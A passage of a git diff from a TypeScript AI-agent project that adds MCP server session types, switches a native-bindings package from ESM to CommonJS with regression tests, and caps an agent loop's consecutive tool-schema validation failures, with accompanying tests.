0); + } + } + + // Terminal detection — auto-mode/step-mode stopped + if (isTerminalNotification(event as Record)) { + // Check if it's a blocked stop (not truly terminal — it's a blocker) + if (isBlockedNotification(event as Record)) { + session.status = 'blocked'; + session.pendingBlocker = extractBlocker(event); + } else { + session.status = 'completed'; + session.unsubscribe?.(); + } + return; + } + + // Blocker detection — non-fire-and-forget extension_ui_request + if (isBlockingUIRequest(event as Record)) { + session.status = 'blocked'; + session.pendingBlocker = extractBlocker(event); + } + } +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function timeout(ms: number, message: string): Promise { + return new Promise((_, reject) => { + setTimeout(() => reject(new Error(message)), ms); + }); +} + +function extractBlocker(event: SdkAgentEvent): PendingBlocker { + const uiEvent = event as unknown as RpcExtensionUIRequest; + return { + id: String(uiEvent.id ?? ''), + method: String(uiEvent.method ?? ''), + message: String((uiEvent as Record).title ?? (uiEvent as Record).message ?? ''), + event: uiEvent, + }; +} diff --git a/packages/mcp-server/src/types.ts b/packages/mcp-server/src/types.ts new file mode 100644 index 000000000..fa12c9f61 --- /dev/null +++ b/packages/mcp-server/src/types.ts @@ -0,0 +1,107 @@ +/** + * MCP Server types — session lifecycle and orchestration. 
+ */ + +import type { RpcClient, SdkAgentEvent, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; + +// --------------------------------------------------------------------------- +// Session Status +// --------------------------------------------------------------------------- + +export type SessionStatus = 'starting' | 'running' | 'blocked' | 'completed' | 'error' | 'cancelled'; + +// --------------------------------------------------------------------------- +// Managed Session +// --------------------------------------------------------------------------- + +export interface ManagedSession { + /** Unique session ID returned from RpcClient.init() */ + sessionId: string; + + /** Absolute path to the project directory */ + projectDir: string; + + /** Current lifecycle status */ + status: SessionStatus; + + /** The RpcClient instance managing the agent process */ + client: RpcClient; + + /** Ring buffer of recent events (capped at MAX_EVENTS) */ + events: SdkAgentEvent[]; + + /** Pending blocker requiring user response, if any */ + pendingBlocker: PendingBlocker | null; + + /** Cumulative cost tracking (max pattern per K004) */ + cost: CostAccumulator; + + /** Session start timestamp */ + startTime: number; + + /** Error message if status is 'error' */ + error?: string; + + /** Cleanup function to unsubscribe from events */ + unsubscribe?: () => void; +} + +// --------------------------------------------------------------------------- +// Pending Blocker +// --------------------------------------------------------------------------- + +export interface PendingBlocker { + /** The extension_ui_request id */ + id: string; + + /** The request method (e.g. 
'select', 'confirm', 'input') */ + method: string; + + /** Human-readable message or title */ + message: string; + + /** Full event payload for inspection */ + event: RpcExtensionUIRequest; +} + +// --------------------------------------------------------------------------- +// Cost Accumulator (K004 — cumulative-max) +// --------------------------------------------------------------------------- + +export interface CostAccumulator { + totalCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +// --------------------------------------------------------------------------- +// Execute Options +// --------------------------------------------------------------------------- + +export interface ExecuteOptions { + /** Command to send after '/gsd auto' (default: none) */ + command?: string; + + /** Model ID override */ + model?: string; + + /** Run in bare mode (skip user config) */ + bare?: boolean; + + /** Path to CLI binary (overrides GSD_CLI_PATH and which resolution) */ + cliPath?: string; +} + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +/** Maximum number of events kept in the ring buffer */ +export const MAX_EVENTS = 50; + +/** Timeout for RpcClient initialization (ms) */ +export const INIT_TIMEOUT_MS = 30_000; diff --git a/packages/mcp-server/tsconfig.json b/packages/mcp-server/tsconfig.json new file mode 100644 index 000000000..779b48aca --- /dev/null +++ b/packages/mcp-server/tsconfig.json @@ -0,0 +1,24 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "declaration": true, + "declarationMap": true, + "sourceMap": true, + "inlineSources": true, + "inlineSourceMap": false, + "moduleResolution": "Node16", + 
"resolveJsonModule": true, + "allowImportingTsExtensions": false, + "types": ["node"], + "outDir": "./dist", + "rootDir": "./src" + }, + "include": ["src/**/*.ts"], + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] +} diff --git a/packages/native/package.json b/packages/native/package.json index 1bb3b009d..42bc47668 100644 --- a/packages/native/package.json +++ b/packages/native/package.json @@ -2,7 +2,7 @@ "name": "@gsd/native", "version": "0.1.0", "description": "Native Rust bindings for GSD \u2014 high-performance native modules via N-API", - "type": "module", + "type": "commonjs", "main": "./dist/index.js", "types": "./dist/index.d.ts", "scripts": { @@ -14,75 +14,75 @@ "exports": { ".": { "types": "./dist/index.d.ts", - "import": "./dist/index.js" + "default": "./dist/index.js" }, "./grep": { "types": "./dist/grep/index.d.ts", - "import": "./dist/grep/index.js" + "default": "./dist/grep/index.js" }, "./ps": { "types": "./dist/ps/index.d.ts", - "import": "./dist/ps/index.js" + "default": "./dist/ps/index.js" }, "./glob": { "types": "./dist/glob/index.d.ts", - "import": "./dist/glob/index.js" + "default": "./dist/glob/index.js" }, "./clipboard": { "types": "./dist/clipboard/index.d.ts", - "import": "./dist/clipboard/index.js" + "default": "./dist/clipboard/index.js" }, "./ast": { "types": "./dist/ast/index.d.ts", - "import": "./dist/ast/index.js" + "default": "./dist/ast/index.js" }, "./html": { "types": "./dist/html/index.d.ts", - "import": "./dist/html/index.js" + "default": "./dist/html/index.js" }, "./text": { "types": "./dist/text/index.d.ts", - "import": "./dist/text/index.js" + "default": "./dist/text/index.js" }, "./fd": { "types": "./dist/fd/index.d.ts", - "import": "./dist/fd/index.js" + "default": "./dist/fd/index.js" }, "./image": { "types": "./dist/image/index.d.ts", - "import": "./dist/image/index.js" + "default": "./dist/image/index.js" }, "./xxhash": { "types": "./dist/xxhash/index.d.ts", - "import": "./dist/xxhash/index.js" + 
"default": "./dist/xxhash/index.js" }, "./diff": { "types": "./dist/diff/index.d.ts", - "import": "./dist/diff/index.js" + "default": "./dist/diff/index.js" }, "./gsd-parser": { "types": "./dist/gsd-parser/index.d.ts", - "import": "./dist/gsd-parser/index.js" + "default": "./dist/gsd-parser/index.js" }, "./highlight": { "types": "./dist/highlight/index.d.ts", - "import": "./dist/highlight/index.js" + "default": "./dist/highlight/index.js" }, "./json-parse": { "types": "./dist/json-parse/index.d.ts", - "import": "./dist/json-parse/index.js" + "default": "./dist/json-parse/index.js" }, "./stream-process": { "types": "./dist/stream-process/index.d.ts", - "import": "./dist/stream-process/index.js" + "default": "./dist/stream-process/index.js" }, "./truncate": { "types": "./dist/truncate/index.d.ts", - "import": "./dist/truncate/index.js" + "default": "./dist/truncate/index.js" }, "./ttsr": { "types": "./dist/ttsr/index.d.ts", - "import": "./dist/ttsr/index.js" + "default": "./dist/ttsr/index.js" } }, "files": [ diff --git a/packages/native/src/__tests__/module-compat.test.mjs b/packages/native/src/__tests__/module-compat.test.mjs new file mode 100644 index 000000000..949fd16d3 --- /dev/null +++ b/packages/native/src/__tests__/module-compat.test.mjs @@ -0,0 +1,91 @@ +/** + * Tests that the @gsd/native package.json is correctly configured + * for Node.js module resolution (ESM/CJS compatibility). + * + * Regression test for #2861: "type": "module" + "import"-only export + * conditions caused crashes on Node.js v24 when the parent package also + * declared "type": "module" and strict ESM resolution was enforced. 
+ */ + +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import * as path from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = path.dirname(fileURLToPath(import.meta.url)); +const pkgPath = path.resolve(__dirname, "..", "..", "package.json"); +const pkg = JSON.parse(readFileSync(pkgPath, "utf8")); + +describe("@gsd/native module compatibility (#2861)", () => { + test("package.json must not declare type: module (compiled output is CJS-compatible)", () => { + // The compiled output uses createRequire() to load .node addons. + // Declaring "type": "module" forces Node.js to treat .js files as ESM, + // but the package needs "type": "commonjs" to override the parent + // package's "type": "module" and ensure correct CJS semantics. + assert.notEqual( + pkg.type, + "module", + 'package.json must not set "type": "module" — this causes crashes on Node.js v24 ' + + "when the parent package also declares ESM (see #2861)", + ); + }); + + test("package.json should explicitly declare type: commonjs", () => { + // When installed as a dependency under a parent with "type": "module" + // (e.g. gsd-pi), an absent "type" field would inherit the parent's + // ESM setting. Explicit "commonjs" overrides this. + assert.equal( + pkg.type, + "commonjs", + 'package.json must explicitly set "type": "commonjs" to override ' + + "the parent package's ESM declaration", + ); + }); + + test("all export conditions must use 'default' (not 'import'-only)", () => { + // The "import" condition key restricts resolution to ESM import + // statements only. Using "default" ensures the export works for both + // require() and import, which is essential for a CJS package that may + // be consumed from ESM code via Node's CJS interop. 
+ const exportsMap = pkg.exports; + assert.ok(exportsMap, "package.json must have an exports map"); + + for (const [subpath, conditions] of Object.entries(exportsMap)) { + assert.ok( + !conditions.import || conditions.default, + `exports["${subpath}"] uses "import" condition without "default" — ` + + `this breaks CJS consumers and Node.js v24 strict resolution`, + ); + } + }); + + test("native.ts source must not use bare import.meta.url (parse-time error in CJS)", () => { + // When compiled to CJS, import.meta is a *parse-time* syntax error -- + // typeof guards don't help because Node rejects the syntax before + // executing any code. The source must wrap import.meta access in + // an indirect eval so the CJS parser never sees the bare syntax. + const nativeSrc = readFileSync( + path.resolve(__dirname, "..", "native.ts"), + "utf8", + ); + + // Bare import.meta.url (NOT wrapped) would crash at parse time in CJS. + // These regexes match direct usage like fileURLToPath(import.meta.url) + // and createRequire(import.meta.url), but NOT indirect patterns that + // hide import.meta from the CJS parser. 
+ const hasBareImportMetaDirname = /path\.dirname\(.*fileURLToPath\(import\.meta\.url\)\)/.test(nativeSrc); + const hasBareImportMetaRequire = /createRequire\(import\.meta\.url\)/.test(nativeSrc); + + assert.ok( + !hasBareImportMetaDirname, + "native.ts must not use bare import.meta.url in fileURLToPath() -- " + + "this is a parse-time syntax error in CJS; use indirect eval", + ); + assert.ok( + !hasBareImportMetaRequire, + "native.ts must not use bare import.meta.url in createRequire() -- " + + "this is a parse-time syntax error in CJS; use indirect eval", + ); + }); +}); diff --git a/packages/native/src/__tests__/stream-process.test.mjs b/packages/native/src/__tests__/stream-process.test.mjs new file mode 100644 index 000000000..224f0bffa --- /dev/null +++ b/packages/native/src/__tests__/stream-process.test.mjs @@ -0,0 +1,34 @@ +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { processStreamChunk } from "../stream-process/index.ts"; + +describe("processStreamChunk", () => { + test("processes a single chunk without state", () => { + const result = processStreamChunk(Buffer.from("hello world\n")); + assert.equal(result.text, "hello world\n"); + assert.ok(Array.isArray(result.state.utf8Pending)); + assert.ok(Array.isArray(result.state.ansiPending)); + }); + + test("processes multiple chunks passing state between calls", () => { + const result1 = processStreamChunk(Buffer.from("first\n")); + assert.equal(result1.text, "first\n"); + + // This was the crash: passing state back caused + // "Given napi value is not an array on StreamState.utf8Pending" + // when state arrays were wrapped in Buffer.from() instead of Array.from() + const result2 = processStreamChunk(Buffer.from("second\n"), result1.state); + assert.equal(result2.text, "second\n"); + + const result3 = processStreamChunk(Buffer.from("third\n"), result2.state); + assert.equal(result3.text, "third\n"); + }); + + test("state fields are plain arrays, not Buffers", () 
=> { + const result = processStreamChunk(Buffer.from("test\n")); + assert.ok(Array.isArray(result.state.utf8Pending), "utf8Pending should be a plain array"); + assert.ok(Array.isArray(result.state.ansiPending), "ansiPending should be a plain array"); + assert.ok(!(result.state.utf8Pending instanceof Buffer), "utf8Pending should not be a Buffer"); + assert.ok(!(result.state.ansiPending instanceof Buffer), "ansiPending should not be a Buffer"); + }); +}); diff --git a/packages/native/src/native.ts b/packages/native/src/native.ts index b310cef28..05d4288b1 100644 --- a/packages/native/src/native.ts +++ b/packages/native/src/native.ts @@ -8,14 +8,15 @@ * 3. native/addon/gsd_engine.dev.node (local debug build) */ -import { createRequire } from "node:module"; import * as path from "node:path"; -import { fileURLToPath } from "node:url"; -const __dirname = path.dirname(fileURLToPath(import.meta.url)); -const require = createRequire(import.meta.url); +// __dirname and require are available in both execution contexts: +// - CJS (production build via tsc): provided natively by Node +// - ESM (CI test loader): injected by the dist-redirect.mjs preamble +const _dirname = __dirname; +const _require = require; -const addonDir = path.resolve(__dirname, "..", "..", "..", "native", "addon"); +const addonDir = path.resolve(_dirname, "..", "..", "..", "native", "addon"); const platformTag = `${process.platform}-${process.arch}`; /** Map Node.js platform/arch to the npm package suffix */ @@ -36,7 +37,7 @@ function loadNative(): Record { const packageSuffix = platformPackageMap[platformTag]; if (packageSuffix) { try { - _loadedSuccessfully = true; return require(`@gsd-build/engine-${packageSuffix}`) as Record; + _loadedSuccessfully = true; return _require(`@gsd-build/engine-${packageSuffix}`) as Record; } catch (err) { const message = err instanceof Error ? 
err.message : String(err); errors.push(`@gsd-build/engine-${packageSuffix}: ${message}`); @@ -46,7 +47,7 @@ function loadNative(): Record { // 2. Try local release build (native/addon/gsd_engine.{platform}.node) const releasePath = path.join(addonDir, `gsd_engine.${platformTag}.node`); try { - _loadedSuccessfully = true; return require(releasePath) as Record; + _loadedSuccessfully = true; return _require(releasePath) as Record; } catch (err) { const message = err instanceof Error ? err.message : String(err); errors.push(`${releasePath}: ${message}`); @@ -55,7 +56,7 @@ function loadNative(): Record { // 3. Try local dev build (native/addon/gsd_engine.dev.node) const devPath = path.join(addonDir, "gsd_engine.dev.node"); try { - _loadedSuccessfully = true; return require(devPath) as Record; + _loadedSuccessfully = true; return _require(devPath) as Record; } catch (err) { const message = err instanceof Error ? err.message : String(err); errors.push(`${devPath}: ${message}`); diff --git a/packages/native/src/stream-process/index.ts b/packages/native/src/stream-process/index.ts index 5fa3c2ab9..4a622b144 100644 --- a/packages/native/src/stream-process/index.ts +++ b/packages/native/src/stream-process/index.ts @@ -33,8 +33,8 @@ export function processStreamChunk( // Convert StreamState arrays to the format napi expects (Vec) const napiState = state ? 
{ - utf8Pending: Buffer.from(state.utf8Pending), - ansiPending: Buffer.from(state.ansiPending), + utf8Pending: Array.from(state.utf8Pending), + ansiPending: Array.from(state.ansiPending), } : undefined; diff --git a/packages/pi-agent-core/src/agent-loop.test.ts b/packages/pi-agent-core/src/agent-loop.test.ts new file mode 100644 index 000000000..9eda6af35 --- /dev/null +++ b/packages/pi-agent-core/src/agent-loop.test.ts @@ -0,0 +1,357 @@ +// agent-loop tests +// Covers: pauseTurn handling (#2869), schema overload retry cap (#2783) + +import { describe, it, mock } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join, dirname } from "node:path"; +import { fileURLToPath } from "node:url"; +import { Type } from "@sinclair/typebox"; +import { agentLoop, MAX_CONSECUTIVE_VALIDATION_FAILURES } from "./agent-loop.js"; +import type { AgentContext, AgentLoopConfig, AgentTool, AgentEvent, AgentMessage } from "./types.js"; +import { AssistantMessageEventStream, EventStream } from "@gsd/pi-ai"; +import type { AssistantMessage, AssistantMessageEvent, Model } from "@gsd/pi-ai"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); + +describe("agent-loop — pauseTurn handling (#2869)", () => { + it("sets hasMoreToolCalls when stopReason is pauseTurn", () => { + const source = readFileSync(join(__dirname, "agent-loop.ts"), "utf-8"); + + // The agent loop must treat pauseTurn as a reason to continue the inner + // loop, just like toolUse. This prevents incomplete server_tool_use blocks + // from being saved to history, which would cause a 400 on the next request. 
+ assert.match( + source, + /pauseTurn/, + "agent-loop.ts must handle the pauseTurn stop reason", + ); + + // Verify it sets hasMoreToolCalls = true for pauseTurn + assert.match( + source, + /stopReason\s*===?\s*["']pauseTurn["']/, + 'agent-loop.ts must check for stopReason === "pauseTurn"', + ); + }); + + it("pauseTurn is in the StopReason union type", () => { + // Read the pi-ai types to ensure pauseTurn is a valid StopReason + const typesPath = join(__dirname, "..", "..", "pi-ai", "src", "types.ts"); + const typesSource = readFileSync(typesPath, "utf-8"); + assert.match( + typesSource, + /["']pauseTurn["']/, + 'StopReason type must include "pauseTurn"', + ); + }); +}); + +/** + * Regression tests for #2783: Stuck-loop on execute-task — tool-call schema + * overload causes unbounded retry + budget burn. + * + * When the LLM repeatedly emits tool calls with arguments that fail schema + * validation, the agent loop retries indefinitely. Each failed validation + * returns an error tool result, the LLM retries with the same broken args, + * and the cycle never breaks — burning budget with no progress. + * + * The fix caps consecutive validation failures per turn at + * MAX_CONSECUTIVE_VALIDATION_FAILURES (default 3). Once the cap is hit, the + * loop injects a synthetic stop so the agent terminates cleanly instead of + * spinning forever. 
+ */ + +// ─── Helpers ────────────────────────────────────────────────────────────────── + +const TEST_MODEL: Model<"anthropic-messages"> = { + id: "claude-test", + name: "Test Model", + api: "anthropic-messages", + provider: "anthropic", + contextWindow: 200_000, + maxOutput: 4096, + supportsImages: false, + supportsPromptCache: false, + thinkingLevel: undefined, +}; + +function makeToolWithSchema(): AgentTool { + return { + name: "write_file", + label: "Write File", + description: "Write content to a file", + parameters: Type.Object({ + path: Type.String(), + content: Type.String(), + }), + execute: async () => ({ + content: [{ type: "text" as const, text: "done" }], + details: {}, + }), + }; +} + +/** + * Creates a mock streamFn that returns assistant messages from a queue. + * Each call pops the next message. The messages simulate the LLM repeatedly + * emitting the same tool call with broken arguments. + */ +function createMockStreamFn(responses: AssistantMessage[]) { + let callIndex = 0; + + return function mockStreamFn(): AssistantMessageEventStream { + const message = responses[callIndex] ?? 
responses[responses.length - 1]; + callIndex++; + + const stream = new AssistantMessageEventStream(); + // Simulate async delivery + queueMicrotask(() => { + stream.push({ type: "start", partial: message }); + stream.push({ type: "done", message }); + stream.end(message); + }); + return stream; + }; +} + +function makeAssistantMessage(overrides: Partial = {}): AssistantMessage { + return { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-test", + usage: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0, totalTokens: 150, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, + stopReason: "stop", + timestamp: Date.now(), + ...overrides, + }; +} + +function makeToolCallMessage(toolCallArgs: Record): AssistantMessage { + return makeAssistantMessage({ + content: [ + { + type: "toolCall", + id: `tc_${Date.now()}_${Math.random()}`, + name: "write_file", + arguments: toolCallArgs, + }, + ], + stopReason: "toolUse", + }); +} + +function collectEvents(stream: EventStream): Promise { + return new Promise(async (resolve) => { + const events: AgentEvent[] = []; + for await (const event of stream) { + events.push(event); + } + resolve(events); + }); +} + +// ─── Tests ──────────────────────────────────────────────────────────────────── + +describe("agent-loop — schema overload retry cap (#2783)", () => { + + it("terminates after MAX_CONSECUTIVE_VALIDATION_FAILURES consecutive schema failures", async () => { + const tool = makeToolWithSchema(); + + // LLM keeps sending tool calls with invalid args (missing required 'content' field) + const badToolCall = makeToolCallMessage({ path: "/tmp/test" }); // missing 'content' + const finalStop = makeAssistantMessage({ content: [{ type: "text", text: "I give up." 
}], stopReason: "stop" }); + + // Create enough bad responses to exceed the cap, plus a final stop + const responses: AssistantMessage[] = []; + for (let i = 0; i < MAX_CONSECUTIVE_VALIDATION_FAILURES + 5; i++) { + responses.push(badToolCall); + } + responses.push(finalStop); + + const mockStream = createMockStreamFn(responses); + + const context: AgentContext = { + systemPrompt: "You are a test agent.", + messages: [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + tools: [tool], + }; + + const config: AgentLoopConfig = { + model: TEST_MODEL, + convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"), + toolExecution: "sequential", + }; + + const stream = agentLoop( + [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + context, + config, + undefined, + mockStream as any, + ); + + const events = await collectEvents(stream); + + // Must have terminated (agent_end event present) + const agentEnd = events.find((e) => e.type === "agent_end"); + assert.ok(agentEnd, "agent loop must emit agent_end after hitting retry cap"); + + // Count how many turns had validation errors (tool_execution_end with isError: true) + const toolErrors = events.filter( + (e) => e.type === "tool_execution_end" && e.isError === true, + ); + + // Must not exceed the cap + assert.ok( + toolErrors.length <= MAX_CONSECUTIVE_VALIDATION_FAILURES, + `Expected at most ${MAX_CONSECUTIVE_VALIDATION_FAILURES} validation error tool results, got ${toolErrors.length}`, + ); + }); + + it("resets the failure counter when a tool call succeeds", async () => { + const tool = makeToolWithSchema(); + + // Pattern: 2 failures, 1 success, 2 failures, 1 success, then stop + const badCall = makeToolCallMessage({ path: "/tmp/test" }); // missing 'content' + const goodCall = makeToolCallMessage({ path: "/tmp/test", content: "hello" }); + const finalStop = makeAssistantMessage({ content: [{ type: "text", text: "Done." 
}], stopReason: "stop" }); + + const responses = [badCall, badCall, goodCall, badCall, badCall, goodCall, finalStop]; + const mockStream = createMockStreamFn(responses); + + const context: AgentContext = { + systemPrompt: "You are a test agent.", + messages: [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + tools: [tool], + }; + + const config: AgentLoopConfig = { + model: TEST_MODEL, + convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"), + toolExecution: "sequential", + }; + + const stream = agentLoop( + [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }], + context, + config, + undefined, + mockStream as any, + ); + + const events = await collectEvents(stream); + + // Must complete successfully since failures never reached cap consecutively + const agentEnd = events.find((e) => e.type === "agent_end"); + assert.ok(agentEnd, "agent loop must complete normally when failures are interspersed with successes"); + + // Should have processed all 6 tool-bearing turns + const toolExecEnds = events.filter((e) => e.type === "tool_execution_end"); + assert.ok(toolExecEnds.length >= 4, `Expected at least 4 tool executions (2 bad + 1 good + 2 bad + 1 good), got ${toolExecEnds.length}`); + }); + + it("exports MAX_CONSECUTIVE_VALIDATION_FAILURES as a configurable constant", () => { + assert.equal(typeof MAX_CONSECUTIVE_VALIDATION_FAILURES, "number"); + assert.ok(MAX_CONSECUTIVE_VALIDATION_FAILURES >= 2, "Cap must be at least 2 to allow one retry"); + assert.ok(MAX_CONSECUTIVE_VALIDATION_FAILURES <= 10, "Cap must not be unreasonably high"); + }); + + it("does NOT trip schema overload cap on tool execution errors like bash exit code 1 (#3618)", async () => { + // Simulates the real scenario: a tool (bash) that passes validation but + // throws during execution (e.g. rg/grep returning exit code 1 = no matches). 
+ // These are valid tool invocations — the schema was correct, the tool ran, + // it just returned a non-zero exit code. The cap should only trigger for + // preparation/schema failures, not execution failures. + const bashTool: AgentTool = { + name: "bash", + label: "Bash", + description: "Run a bash command", + parameters: Type.Object({ + command: Type.String(), + }), + execute: async () => { + // Simulate bash tool rejecting on non-zero exit code + throw new Error("(no output)\n\nCommand exited with code 1"); + }, + }; + + // LLM sends valid tool calls (schema is correct) that fail at execution + const validBashCall = makeAssistantMessage({ + content: [ + { + type: "toolCall", + id: `tc_bash_${Date.now()}_${Math.random()}`, + name: "bash", + arguments: { command: "rg -l 'nonexistent' src/" }, + }, + ], + stopReason: "toolUse", + }); + const finalStop = makeAssistantMessage({ + content: [{ type: "text", text: "No references found." }], + stopReason: "stop", + }); + + // Send more than MAX_CONSECUTIVE_VALIDATION_FAILURES bash calls that throw + const responses: AssistantMessage[] = []; + for (let i = 0; i < MAX_CONSECUTIVE_VALIDATION_FAILURES + 2; i++) { + responses.push(validBashCall); + } + responses.push(finalStop); + + const mockStream = createMockStreamFn(responses); + + const context: AgentContext = { + systemPrompt: "You are a test agent.", + messages: [{ role: "user", content: [{ type: "text", text: "Search for references" }], timestamp: Date.now() }], + tools: [bashTool], + }; + + const config: AgentLoopConfig = { + model: TEST_MODEL, + convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"), + toolExecution: "sequential", + }; + + const stream = agentLoop( + [{ role: "user", content: [{ type: "text", text: "Search for references" }], timestamp: Date.now() }], + context, + config, + undefined, + mockStream as any, + ); + + const events = await collectEvents(stream); + + // Must complete normally — execution errors should NOT trigger the 
cap + const agentEnd = events.find((e) => e.type === "agent_end"); + assert.ok(agentEnd, "agent loop must emit agent_end"); + + // Count tool execution errors + const toolErrors = events.filter( + (e) => e.type === "tool_execution_end" && e.isError === true, + ); + + // All bash calls should have been attempted (not capped early) + assert.ok( + toolErrors.length >= MAX_CONSECUTIVE_VALIDATION_FAILURES + 2, + `Expected all ${MAX_CONSECUTIVE_VALIDATION_FAILURES + 2} bash execution errors to be processed (not capped), got ${toolErrors.length}`, + ); + + // The stop message should NOT contain the schema overload text + const allMessages = (agentEnd as any).messages as AgentMessage[]; + const lastMessage = allMessages[allMessages.length - 1]; + const lastText = lastMessage.role === "assistant" + ? (lastMessage as AssistantMessage).content.find((c) => c.type === "text") + : undefined; + if (lastText && lastText.type === "text") { + assert.ok( + !lastText.text.includes("consecutive turns with all tool calls failing"), + "Final message must NOT contain schema overload stop text for execution-only errors", + ); + } + }); +}); diff --git a/packages/pi-agent-core/src/agent-loop.ts b/packages/pi-agent-core/src/agent-loop.ts index 436f7b291..f8c7e9231 100644 --- a/packages/pi-agent-core/src/agent-loop.ts +++ b/packages/pi-agent-core/src/agent-loop.ts @@ -22,6 +22,15 @@ import type { StreamFn, } from "./types.js"; +/** + * Maximum number of consecutive turns where ALL tool calls in the turn fail + * schema validation before the loop terminates. This prevents unbounded retry + * loops when the LLM repeatedly emits tool calls with arguments that cannot + * pass validation (e.g., schema overload, truncated JSON, missing required + * fields). 
See: https://github.com/gsd-build/gsd-2/issues/2783 + */ +export const MAX_CONSECUTIVE_VALIDATION_FAILURES = 3; + export const ZERO_USAGE = { input: 0, output: 0, @@ -135,7 +144,10 @@ export function agentLoopContinue( (async () => { const newMessages: AgentMessage[] = []; - const currentContext: AgentContext = { ...context }; + const currentContext: AgentContext = { + ...context, + messages: [...context.messages], + }; stream.push({ type: "agent_start" }); stream.push({ type: "turn_start" }); @@ -172,6 +184,12 @@ async function runLoop( // Check for steering messages at start (user may have typed while waiting) let pendingMessages: AgentMessage[] = (await config.getSteeringMessages?.()) || []; + // Track consecutive turns where ALL tool calls fail validation. + // When the LLM repeatedly emits tool calls with schema-overloaded or malformed + // arguments, each turn produces only error tool results. Without a cap, this + // creates an unbounded retry loop that burns budget. (#2783) + let consecutiveAllToolErrorTurns = 0; + // Outer loop: continues when queued follow-up messages arrive after agent would stop while (true) { let hasMoreToolCalls = true; @@ -228,12 +246,38 @@ async function runLoop( return; } - // Check for tool calls + // Check for tool calls or paused server turn const toolCalls = message.content.filter((c) => c.type === "toolCall"); - hasMoreToolCalls = toolCalls.length > 0; + hasMoreToolCalls = + toolCalls.length > 0 || message.stopReason === "pauseTurn"; const toolResults: ToolResultMessage[] = []; - if (hasMoreToolCalls) { + if (hasMoreToolCalls && config.externalToolExecution) { + // External execution mode: tools were handled by the provider + // (e.g., Claude Code SDK). Emit tool_execution events for each + // tool call. The TUI adds these as components after the message. 
+ for (const tc of toolCalls as AgentToolCall[]) { + stream.push({ + type: "tool_execution_start", + toolCallId: tc.id, + toolName: tc.name, + args: tc.arguments, + }); + stream.push({ + type: "tool_execution_end", + toolCallId: tc.id, + toolName: tc.name, + result: { + content: [{ type: "text", text: "(executed by Claude Code)" }], + details: {}, + }, + isError: false, + }); + } + // Don't add tool results to context or loop back — the streamSimple + // call already ran the full multi-turn agentic loop. + hasMoreToolCalls = false; + } else if (hasMoreToolCalls) { const toolExecution = await executeToolCalls( currentContext, message, @@ -248,6 +292,54 @@ async function runLoop( currentContext.messages.push(result); newMessages.push(result); } + + // Schema overload detection (#2783): count only preparation-phase + // errors (schema validation, tool-not-found, tool-blocked) toward the + // consecutive failure cap. Tool execution errors — such as bash + // commands returning non-zero exit codes (e.g. grep/rg exit 1 for + // "no matches") — are valid tool usage and must NOT trigger the cap. + // See: #3618 + const hasPreparationErrors = toolExecution.preparationErrorCount > 0; + const allToolsFailedPreparation = + toolResults.length > 0 && + toolExecution.preparationErrorCount === toolResults.length; + if (allToolsFailedPreparation) { + consecutiveAllToolErrorTurns++; + } else if (!hasPreparationErrors) { + // Reset only when there are zero preparation errors this turn. + // Mixed turns (some prep errors, some successes) don't reset, + // but they also don't increment — this avoids masking a + // pattern of alternating schema failures with one working call. + consecutiveAllToolErrorTurns = 0; + } + + if (consecutiveAllToolErrorTurns >= MAX_CONSECUTIVE_VALIDATION_FAILURES) { + // Force-stop: the LLM is stuck retrying broken tool calls. + // Emit the turn_end and terminate the agent loop cleanly. 
+ stream.push({ type: "turn_end", message, toolResults }); + const stopMessage: AssistantMessage = { + role: "assistant", + content: [ + { + type: "text", + text: `Agent stopped: ${consecutiveAllToolErrorTurns} consecutive turns with all tool calls failing. This usually means the model is repeatedly sending arguments that do not match the tool schema.`, + }, + ], + api: config.model.api, + provider: config.model.provider, + model: config.model.id, + usage: ZERO_USAGE, + stopReason: "error", + errorMessage: "Schema overload: consecutive tool validation failures exceeded cap", + timestamp: Date.now(), + }; + emitMessagePair(stream, stopMessage); + newMessages.push(stopMessage); + stream.push({ type: "turn_end", message: stopMessage, toolResults: [] }); + stream.push({ type: "agent_end", messages: newMessages }); + stream.end(newMessages); + return; + } } stream.push({ type: "turn_end", message, toolResults }); @@ -370,6 +462,19 @@ async function streamAssistantResponse( return await response.result(); } +/** + * Result from executing tool calls in a turn. Includes metadata about + * error provenance so the schema overload detector can distinguish + * preparation failures (schema validation, tool-not-found, tool-blocked) + * from execution failures (the tool ran but threw, e.g. bash exit code 1). + */ +interface ToolExecutionResult { + toolResults: ToolResultMessage[]; + steeringMessages?: AgentMessage[]; + /** Number of tool results that failed during preparation (validation/schema). */ + preparationErrorCount: number; +} + /** * Execute tool calls from an assistant message. 
